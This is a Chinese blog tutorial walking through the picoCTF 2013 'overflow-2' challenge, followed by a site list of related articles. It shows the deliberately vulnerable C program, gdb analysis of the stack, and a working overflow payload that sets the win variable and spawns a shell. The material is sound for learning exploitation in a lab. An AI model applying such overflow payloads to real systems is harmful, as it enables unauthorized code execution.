pico-ctf-2013 overflow-2

最新推荐文章于 2023-07-29 00:14:43 发布
最新推荐文章于 2023-07-29 00:14:43 发布
阅读量1.1k 收藏
点赞数
分类专栏: PWN类型之栈溢出入门 文章标签: 栈溢出入门教程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33528164/article/details/71304830
版权

栈溢出入门系列入门教程二

overflow2.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "dump_stack.h"

void vuln(int win, char *str) {
    char buf[64];
    strcpy(buf, str);
    dump_stack((void **) buf, 23, (void **) &win);
    printf("win = %d\n", win);
    if (win == 1) {
        execl("/bin/sh", "sh", NULL);
    } else {
        printf("Sorry, you lose.\n");
    }
    exit(0);
}

int main(int argc, char **argv) {
    if (argc != 2) {
        printf("Usage: stack_overwrite [str]\n");
        return 1;
    }

    uid_t euid = geteuid();
    setresuid(euid, euid, euid);
    vuln(0, argv[1]);
    return 0;
}

dump_stack:打印当前cpu的堆栈.

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : disabled
PIE       : disabled
RELRO     : Partial

由此可见,该程序相当脆弱.只要我们溢出数据,使win为1即可.
两种方法:
方法一:

gdb --args ./overflow2 $(python -c "print 'A'*64+'B'*4")

gdb调试,由于源代码中有if,于是我们进入vuln函数,找到了if对应的汇编代码,如下:

0x8048666 <vuln+62>:    mov    DWORD PTR [esp],eax
0x8048669 <vuln+65>:    call   0x80483f0 <printf@plt>
0x804866e <vuln+70>:    mov    eax,DWORD PTR [ebp+0x8]
**0x8048671 <vuln+73>:  cmp    eax,0x1**
0x8048674 <vuln+76>:    jne    0x8048694 <vuln+108>
0x8048676 <vuln+78>:    mov    DWORD PTR [esp+0x8],0x0

可见这次是拿地址为ebp+0x8的内容与1相比较.同本系列第一篇一样,在cmp出下断点,查看栈中的内容.

gdb-peda$ x/90x 0xffffce20
0xffffce20: 0x410x410x410x410x410x410x410x41
0xffffce28: 0x40x410x410x410x410x410x410x41
0xffffce30: 0x410x410x410x410x410x410x410x41
0xffffce38: 0x410x410x410x410x410x410x410x41
0xffffce40: 0x410x410x410x410x410x410x410x41
0xffffce48: 0x410x410x410x410x410x410x410x41
0xffffce50: 0x410x410x410x410x410x410x410x41
0xffffce58: 0x410x410x410x410x410x410x410x41
0xffffce60: 0x420x420x420x420x000xf10xea0xf7
0xffffce68: 0x980xce0xff0xff0x0b0x870x040x08
0xffffce70: 0x000x000x000x000x650xd10xff0xff
0xffffce78: 0xe80x03

对应截图:
cmp
ebp+0x8=0xffffce70,0xffffce70与char数组相差0x50(0xffffce70-0xffffce20).于是乎构造出

./overflow2 $(python -c "print 'A'*80+'\x01\x00\x00\x00'")

结果图:
结果图
其实前本系列前两篇文章思路差不多.
方法二:思路就是写一个自动化脚本,来循环判断是否溢出成功.实现还是有点困难,以后再写.
注:由于操作系统的原因,一些地址可能会有不同,在此一定要以你的电脑上的地址为准.附带相关文件地址:文件地址.欢迎评论!!!

qq_33528164
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
通过上溢出实现二进制的减法(笔记)
llllyh812的博客
07-14 765
笔记一.溢出二.二进制的减法实现 一.溢出 在数学的理论中,数字可以有无穷大,也可以有无穷小,但是现实中,计算机系统总会有一个 物理上的极限,因此不可能表示无穷大或者无穷小的数值.对于计算机,无论何种数据类型, 都有一个上限或者下限. Python3中数据长度是动态的,理论上支持无限大的数 可以通过sys.getsizeof()函数来查看某个数值占用多少字节. 一旦某个数值超出了限定值,就会溢出:如果超出上限,就叫上溢出(overflow);如果超出下限, 就叫下溢出(underflow). 例:上溢出 n
深入理解CSS溢出overflow
weixin_33950035的博客
03-18 1042
前面的话   当一个元素固定为某个特定大小,但内容在元素中放不下。此时就可以利用overflow属性来控制这种情况   定义 overflow溢出   值: visible | hidden | scroll | auto | inherit   初始值: visible   应用于: 块级元素、替换元素、表单元格   继承性: 无   [注意]除了IE7-浏览器外,其他浏览器...
1218 溢出设置 overflow
pyhui的技术博客
12-19 527
1218 溢出设置 overflow overflow属性 元素益出设置 overflow值 visible,可见的 hidden,隐藏 scroll,滚动条 auto,自动显示滚动条
overflow(2)
快乐小编的专栏
10-10 2566
9、内部浮动无影响 .clearFix{overflow: hidden; zoom: 1} .clear{zoom: 1} .clear:after{content: ''; display: table;clear: both} 10、overflow 的 两栏自适应布局 设置左边浮动,右边overflow .left { float: left; width:
picoCTF,Web Exploitation,网页开发类,39/45
Allezima阿力代码
02-10 2540
记录一下自己做的CTF,最初将所有题目放在一个帖子里,帖子太长了,为了方便后期编辑和阅读。2023年02月10日,将帖子拆分……
pico8:其他。 PICO-8游戏
02-05
杂项PICO-8游戏 此处可玩的游戏: ://www.lexaloffle.com/bbs/?uid 25532 mode carts或 游戏类 Nuklear Klone 弗兰比尔核宝座的蜕变 雷刃 经典世嘉街机游戏的变形 抗锯齿小行星 与合作为PICO-8带来了快速AA线 X...
pico-8:我写的pico-8墨盒的集合
02-05
**PICO-8:探索像素艺术游戏开发的奇妙世界** PICO-8 是一个被称为“虚拟游戏卡带”的复古风格的游戏创作平台,它为开发者提供了一个集成的环境,用于创建、分享和玩2D像素游戏。这个平台由 Lexaloffle 开发,旨在...
pico8-bullet-cat:PICO-8游戏实验
02-05
PICO-8游戏实验:探索PICO-8与Lua编程的艺术》 PICO-8是一款独特的复古风格的游戏创作工具,它集成了游戏引擎、代码编辑器、图形和声音编辑器,让开发者能够在一个小巧的虚拟机环境中创建自己的像素艺术游戏。在...
pico-8推车:PICO-8墨盒
02-06
2. **图形限制**:PICO-8的屏幕分辨率是128x128像素,使用16色调色板。艺术家们需要在这个限制下设计出引人入胜的视觉效果,这也成为PICO-8游戏的一大特色。 3. **音频限制**:PICO-8内置了4声道音乐合成器和音效...
pico-8:PICO-8游戏
02-06
2. **PICO-8的游戏开发流程** - **地图编辑**:开发者可以使用内置的地图编辑器创建游戏世界,包括关卡布局和对象放置。 - **精灵与图形**:使用画图工具设计游戏中的角色、物品和其他视觉元素,每个图像都限制在...
picoCTF:picoCTF挑战的解决方案
03-31
微微CTF 您好,我将尽可能详细地发布针对picoCTF问题的解决方案。 我建议您先尝试自己解决问题,如果遇到困难,可以按照我的详细解决方案进行操作!
CTF PWN-攻防世界Overflow整数溢出漏洞
道阻且长,行则将至。
07-29 1440
本文学习了缓冲区溢出漏洞常见的一种场景:整数溢出。一旦不认真考虑整数变量的范围,此类漏洞缺陷很容易在程序员的编码过程中发生,这也是安全工作人员需要注意审计的地方。
overflow溢出处理
路漫漫~
05-03 4万+
overflow 属性规定当内容溢出元素框时发生的事情 overflow: hidden:隐藏 visible:出现,默认 scroll:滚动条 auto:自动隐藏出现滚动条 IE存在一个bug,当宽高特别小的时候显示效果不一致,可以使用overfollow:hidden来处理。 为了 保证不出问题,在reset.css的.cls 下添加 overfollow:hid
“黑客”营倒计时 - 体验由卡内基梅隆大学组织的信息安全竞赛
weixin_36841920的博客
02-21 330
眺望前方,有人看到是障碍,有人看到是更大的目标。PicoCTF 由卡内基梅隆大学组织,是全球最大面向中学生的网络信息安全竞赛。去年有7800多个队参赛。PwA队取得了前12%的优异成绩。在为期两周刺激的竞赛过程中,PwA的队员们挑战智力、毅力、体力,夺旗后的快乐感满满,在知识、能力和信心上,获得巨大提升。PicoCTF竞赛的设计原则是”玩乐中学” (Learn in play) ,极具趣味性和挑战...
VS2010中解决Stack overflow问题的关键
qq_35330032的博客
05-15 2801
      编写了一个规约转换的小程序,重定义了几个局部变量,如GSP_HistorySelectCmd_Bay_Resp(头文件中定义的一个数据结构) Bay,用Bay来替代全局变量g_gsp_protocol_resp.history_select_cmd_bay_resp在函数某一部分中使用,编译时频繁报错,error显示的是stack overflow。      采用#if 0...#e...
BugkuCTF-PWN题pwn2-overflow超详细讲解
am_03的博客
08-30 2007
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
CTF|pwn栈溢出题目int_overflow解题思路及个人总结
skyattractive的博客
05-31 2203
CTF|pwn栈溢出题目int_overflow解题思路及个人总结 解题思路 拿到题目,标题是int_overflow 指可能是某个int型变量存在栈溢出,留意下 老规矩将题目拖到IDA放入ubuntu中查看相关信息 * stack/canary保护没开 ubuntu运行一下 简单的选择登陆 输入账号密码 返回结果 拖入IDA 反编译 查看main函数 进入login函数 login中定义两个变量buf和s,所给的栈的大小都很大,不存在栈溢出 我们继续进入check_passwd函数 这个函数只要
内容溢出:overflow
热门推荐
weixin_43734012的博客
11-28 6万+
overflow: visible:默认值。内容不会被修建,会呈现在盒子之外 hidden:内容会被修剪,并且其余内容是不可见的 scroll:内容会被修剪,但是浏览器会显示滚动条以便查看其余内容 auto:如果内容被修剪,则浏览器会显示滚动条以便查看 overflow:hidden和clear:both区别: overflow:hidden;作用在父元素,清除父元素内部所有浮动元素 clear:...
c语言实现--数据结构,栈的应用,括号的匹配问题
weixin_43870670的博客
05-25 388
c语言实现--数据结构,栈的应用,括号的匹配问题
帮我下载并翻译pico-sdk
最新发布
08-12
总之,下载并翻译pico-sdk需要先从官方网站下载pico-sdk软件包,然后解压缩并浏览其中的示例和文档。通过学习并翻译这些示例和文档,您可以更好地理解和使用pico-sdk来开发和编写适用于Raspberry Pi Pico的应用程序...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值